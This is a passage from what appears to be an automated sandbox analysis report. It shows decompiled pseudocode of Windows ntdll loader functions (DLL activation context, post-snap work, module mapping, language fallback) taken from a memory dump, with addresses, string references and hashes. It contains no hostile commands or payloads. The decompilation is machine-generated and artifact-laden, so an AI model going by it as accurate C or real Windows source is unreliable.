					L9:
					if( !_t49 >= 0) {
						if(( *0x1745780 & 0x00000003) != 0) {
							E016D5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x1745780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0169B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x1747984; // 0x1202b98
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x1748464; // 0x74b10110
					 *0x174b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E01689B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x1745780 & 0x00000005) != 0) {
						_push(_t49);
						E016D5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                                      0x01688e0f
                                                      0x01688e16
                                                      0x01688e19
                                                      0x01688e1b
                                                      0x01688e21
                                                      0x01688e7f
                                                      0x01688e85
                                                      0x016c9354
                                                      0x016c936c
                                                      0x016c9371
                                                      0x016c937b
                                                      0x016c9381
                                                      0x016c9381
                                                      0x016c937b
                                                      0x01688e9d
                                                      0x01688e9d
                                                      0x01688e29
                                                      0x01688e2c
                                                      0x01688e38
                                                      0x01688e3e
                                                      0x01688e43
                                                      0x01688eb5
                                                      0x01688eb9
                                                      0x016c92aa
                                                      0x016c92af
                                                      0x016c92e8
                                                      0x016c92e8
                                                      0x016c92af
                                                      0x01688eb9
                                                      0x01688e45
                                                      0x01688e53
                                                      0x01688e5b
                                                      0x01688e5f
                                                      0x01688e78
                                                      0x01688e78
                                                      0x01688e7d
                                                      0x01688ec3
                                                      0x01688ecd
                                                      0x01688ed2
                                                      0x01688ed2
                                                      0x01688ec5
                                                      0x01688ec5
                                                      0x00000000
                                                      0x01688e7d
                                                      0x01688e67
                                                      0x01688ea4
                                                      0x016c931a
                                                      0x00000000
                                                      0x00000000
                                                      0x016c9320
                                                      0x01688ea4
                                                      0x01688e70
                                                      0x016c9325
                                                      0x016c9340
                                                      0x016c9345
                                                      0x016c9345
                                                      0x01688e76
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000

                                                      Strings
                                                      • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 016C932A
                                                      • Querying the active activation context failed with status 0x%08lx, xrefs: 016C9357
                                                      • LdrpFindDllActivationContext, xrefs: 016C9331, 016C935D
                                                      • minkernel\ntdll\ldrsnap.c, xrefs: 016C933B, 016C9367
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                      • API String ID: 0-3779518884
                                                      • Opcode ID: 46d13368e204a6dd8e18c15ef723d44a077955e21cfb0a867cee6f58c2db091a
                                                      • Instruction ID: 0272f94eddae25c793da079da4048fc611d392455aed825b0642f9de9eec11b0
                                                      • Opcode Fuzzy Hash: 46d13368e204a6dd8e18c15ef723d44a077955e21cfb0a867cee6f58c2db091a
                                                      • Instruction Fuzzy Hash: BA410931A007199FDB36BB5CCC4CA35B6BDAB44758F86836EDA05572D2E7709D80C391
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01668794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 83%
                                                      			E01668794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E0166934A() != 0) {
								_t159 = E016DA9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x1745780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E016D5510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x1745780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E0166849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E01668999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E01668999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x1745c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x1745c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E01672280(_t92, 0x17486cc);
															_t94 = E01729DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E016861A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x1745c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E01668A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x1745c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x1745c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0169F380(_t136, 0x1631184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E01672280(_t108, 0x17486cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E016861A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E01729D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E0166FFB0(_t118, _t156, 0x17486cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E01699A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                                      0x01668799
                                                      0x0166879d
                                                      0x016687a1
                                                      0x016687a3
                                                      0x016687a8
                                                      0x016687c3
                                                      0x016687c3
                                                      0x016687c8
                                                      0x016687d1
                                                      0x016687d4
                                                      0x016687d8
                                                      0x016687e5
                                                      0x016687ec
                                                      0x016b9bfe
                                                      0x016b9c00
                                                      0x016b9c02
                                                      0x016b9c08
                                                      0x016b9c0d
                                                      0x016b9c0f
                                                      0x016b9c14
                                                      0x016b9c2d
                                                      0x016b9c32
                                                      0x016b9c37
                                                      0x016b9c3a
                                                      0x016b9c3c
                                                      0x016b9c42
                                                      0x016b9c42
                                                      0x016b9c3c
                                                      0x016b9c02
                                                      0x016687da
                                                      0x016687df
                                                      0x016687e3
                                                      0x00000000
                                                      0x00000000
                                                      0x016687e3
                                                      0x016687f2
                                                      0x00000000
                                                      0x016687fb
                                                      0x016687fd
                                                      0x016687fe
                                                      0x0166880e
                                                      0x0166880f
                                                      0x01668810
                                                      0x01668814
                                                      0x0166881a
                                                      0x0166881c
                                                      0x0166881f
                                                      0x01668821
                                                      0x01668822
                                                      0x01668824
                                                      0x01668826
                                                      0x0166882c
                                                      0x0166882e
                                                      0x016b9c48
                                                      0x016b9c48
                                                      0x01668834
                                                      0x01668834
                                                      0x01668837
                                                      0x00000000
                                                      0x00000000
                                                      0x01668837
                                                      0x0166882e
                                                      0x0166883d
                                                      0x01668840
                                                      0x01668843
                                                      0x01668846
                                                      0x01668849
                                                      0x0166884c
                                                      0x0166884e
                                                      0x01668850
                                                      0x01668852
                                                      0x01668854
                                                      0x01668857
                                                      0x016688b4
                                                      0x016688b6
                                                      0x016688b6
                                                      0x01668859
                                                      0x01668859
                                                      0x01668859
                                                      0x01668861
                                                      0x01668866
                                                      0x0166886a
                                                      0x0166893d
                                                      0x01668941
                                                      0x00000000
                                                      0x01668947
                                                      0x01668947
                                                      0x0166894a
                                                      0x0166894c
                                                      0x00000000
                                                      0x01668952
                                                      0x01668955
                                                      0x0166895a
                                                      0x0166895d
                                                      0x0166895d
                                                      0x0166895f
                                                      0x01668961
                                                      0x01668961
                                                      0x01668968
                                                      0x00000000
                                                      0x00000000
                                                      0x0166896a
                                                      0x0166896b
                                                      0x0166896e
                                                      0x00000000
                                                      0x01668970
                                                      0x01668970
                                                      0x01668970
                                                      0x01668970
                                                      0x01668972
                                                      0x01668972
                                                      0x01668974
                                                      0x00000000
                                                      0x0166897a
                                                      0x0166897a
                                                      0x0166897d
                                                      0x00000000
                                                      0x01668983
                                                      0x016b9c65
                                                      0x016b9c6d
                                                      0x016b9c72
                                                      0x016b9c75
                                                      0x016b9c75
                                                      0x016b9c82
                                                      0x016b9c86
                                                      0x016b9c87
                                                      0x016b9c88
                                                      0x016b9c89
                                                      0x016b9c8c
                                                      0x016b9c90
                                                      0x016b9c95
                                                      0x016b9c97
                                                      0x016b9ca0
                                                      0x016b9ca3
                                                      0x016b9ca9
                                                      0x016b9ca9
                                                      0x00000000
                                                      0x016b9ca9
                                                      0x016b9ca3
                                                      0x00000000
                                                      0x016b9c97
                                                      0x0166897d
                                                      0x00000000
                                                      0x01668974
                                                      0x01668988
                                                      0x01668992
                                                      0x01668996
                                                      0x00000000
                                                      0x01668996
                                                      0x0166894c
                                                      0x00000000
                                                      0x01668870
                                                      0x0166887b
                                                      0x0166887d
                                                      0x0166887f
                                                      0x01668881
                                                      0x01668884
                                                      0x01668884
                                                      0x01668886
                                                      0x01668889
                                                      0x0166888c
                                                      0x0166888e
                                                      0x01668891
                                                      0x01668891
                                                      0x01668898
                                                      0x00000000
                                                      0x00000000
                                                      0x0166889a
                                                      0x0166889b
                                                      0x0166889e
                                                      0x00000000
                                                      0x00000000
                                                      0x016688a0
                                                      0x016688a8
                                                      0x016688b0
                                                      0x016688b2
                                                      0x016688d3
                                                      0x016688d5
                                                      0x00000000
                                                      0x016688d7
                                                      0x016688db
                                                      0x016688dc
                                                      0x016688e0
                                                      0x016688e8
                                                      0x016688ee
                                                      0x016688f0
                                                      0x016688f3
                                                      0x016688fc
                                                      0x01668901
                                                      0x01668906
                                                      0x0166890c
                                                      0x0166890c
                                                      0x0166890f
                                                      0x01668916
                                                      0x01668917
                                                      0x01668918
                                                      0x01668919
                                                      0x0166891a
                                                      0x0166891f
                                                      0x01668921
                                                      0x016b9c52
                                                      0x016b9c55
                                                      0x016b9c5b
                                                      0x016b9cac
                                                      0x016b9cc0
                                                      0x016b9cc0
                                                      0x016b9c55
                                                      0x01668927
                                                      0x01668927
                                                      0x0166892f
                                                      0x01668933
                                                      0x00000000
                                                      0x016688f5
                                                      0x016688f5
                                                      0x00000000
                                                      0x016688f7
                                                      0x016688f7
                                                      0x016688fa
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x016688fa
                                                      0x016688f5
                                                      0x016688f3
                                                      0x00000000
                                                      0x016688d5
                                                      0x00000000
                                                      0x016688b2
                                                      0x016688c9
                                                      0x00000000
                                                      0x016688c9
                                                      0x0166887f
                                                      0x0166886a
                                                      0x01668857
                                                      0x01668852
                                                      0x016688bf
                                                      0x016688bf
                                                      0x016687aa
                                                      0x016687ad
                                                      0x016687ae
                                                      0x016687b4
                                                      0x016687b5
                                                      0x016687b6
                                                      0x016687b8
                                                      0x016687bd
                                                      0x016687c1
                                                      0x016687f4
                                                      0x016687fa
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x016687c1
                                                      0x00000000

                                                      Strings
                                                      • LdrpDoPostSnapWork, xrefs: 016B9C1E
                                                      • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 016B9C18
                                                      • minkernel\ntdll\ldrsnap.c, xrefs: 016B9C28
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                      • API String ID: 2994545307-1948996284
                                                      • Opcode ID: fcd6caf81f5b3641328c66528cfbe11e8076cc31ee599001941e73854000ce95
                                                      • Instruction ID: b0fc962a48efba3482ed1a204bef283319f524727da461e8bb79caf24505792e
                                                      • Opcode Fuzzy Hash: fcd6caf81f5b3641328c66528cfbe11e8076cc31ee599001941e73854000ce95
                                                      • Instruction Fuzzy Hash: 0291DF71A003169FEF28DF69DC80ABABBBEFF84314B15416DDA05AB241D730AD41CB94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01667E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 98%
                                                      			E01667E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E0166CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E0165C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x1745780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E016D5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x1745780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E01677D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01677D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E016D7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E01677D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01677D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E016D7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0168A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E0165B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                                      0x01667e4c
                                                      0x01667e50
                                                      0x01667e55
                                                      0x01667e58
                                                      0x01667e5d
                                                      0x01667e71
                                                      0x01667f33
                                                      0x01667e77
                                                      0x01667e77
                                                      0x01667e79
                                                      0x01667e79
                                                      0x01667e7e
                                                      0x01667f45
                                                      0x016b9848
                                                      0x00000000
                                                      0x016b9848
                                                      0x01667f4e
                                                      0x01667f53
                                                      0x01667f5a
                                                      0x00000000
                                                      0x00000000
                                                      0x016b985a
                                                      0x016b9862
                                                      0x016b9866
                                                      0x00000000
                                                      0x016b986c
                                                      0x00000000
                                                      0x016b986c
                                                      0x01667e84
                                                      0x01667e84
                                                      0x01667e8d
                                                      0x016b9871
                                                      0x01667eb8
                                                      0x01667ec0
                                                      0x01667ec0
                                                      0x01667e9a
                                                      0x016b987e
                                                      0x00000000
                                                      0x00000000
                                                      0x016b9884
                                                      0x016b988b
                                                      0x016b98a7
                                                      0x016b98ac
                                                      0x016b98b1
                                                      0x016b98b6
                                                      0x016b98b8
                                                      0x016b98b8
                                                      0x016b98b9
                                                      0x00000000
                                                      0x016b98b9
                                                      0x01667ea0
                                                      0x01667ea7
                                                      0x00000000
                                                      0x00000000
                                                      0x01667eac
                                                      0x01667eb1
                                                      0x01667ec6
                                                      0x01667ed0
                                                      0x016b98cc
                                                      0x01667ed6
                                                      0x01667ed6
                                                      0x01667ed6
                                                      0x01667ede
                                                      0x01667ee3
                                                      0x016b98e3
                                                      0x016b98f0
                                                      0x016b9902
                                                      0x016b98f2
                                                      0x016b98fb
                                                      0x016b98fb
                                                      0x016b9907
                                                      0x016b991d
                                                      0x016b991d
                                                      0x016b9907
                                                      0x016b98e3
                                                      0x01667ef0
                                                      0x01667f14
                                                      0x01667f14
                                                      0x01667f1e
                                                      0x016b9946
                                                      0x01667f24
                                                      0x01667f24
                                                      0x01667f24
                                                      0x01667f2c
                                                      0x016b996a
                                                      0x016b9975
                                                      0x016b9975
                                                      0x016b997e
                                                      0x016b9993
                                                      0x016b9993
                                                      0x016b997e
                                                      0x00000000
                                                      0x01667ef2
                                                      0x01667efc
                                                      0x01667f0a
                                                      0x01667f0e
                                                      0x016b9933
                                                      0x00000000
                                                      0x016b9933
                                                      0x00000000
                                                      0x01667f0e
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x01667eb1

                                                      Strings
                                                      • Could not validate the crypto signature for DLL %wZ, xrefs: 016B9891
                                                      • minkernel\ntdll\ldrmap.c, xrefs: 016B98A2
                                                      • LdrpCompleteMapModule, xrefs: 016B9898
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                      • API String ID: 0-1676968949
                                                      • Opcode ID: 815b82bc52da9153848b1db3708fa47b955d2769afa5df78da2070753a0c1962
                                                      • Instruction ID: 72b6232081a9d41da803d19be23f4924d838e25591dc1a9ca0be9f4640a7415f
                                                      • Opcode Fuzzy Hash: 815b82bc52da9153848b1db3708fa47b955d2769afa5df78da2070753a0c1962
                                                      • Instruction Fuzzy Hash: AF513471A00746DBEB22CB6CCD84B6A7BE8EF00718F0406A9EA519B3D1D734ED45CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0165E620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 93%
                                                      			E0165E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E0165F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E016995D0();
						}
						if(_t78 != 0) {
							L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0169FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0169BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E01699600();
					if(_t97 < 0) {
						goto L6;
					}
					E0169BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L0165F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0169BB40(_t83, _t102 + 0x24, _t78);
								if(L016643C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0169BB40(_t84, _t102 + 0x24, _t94);
									if(L016643C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
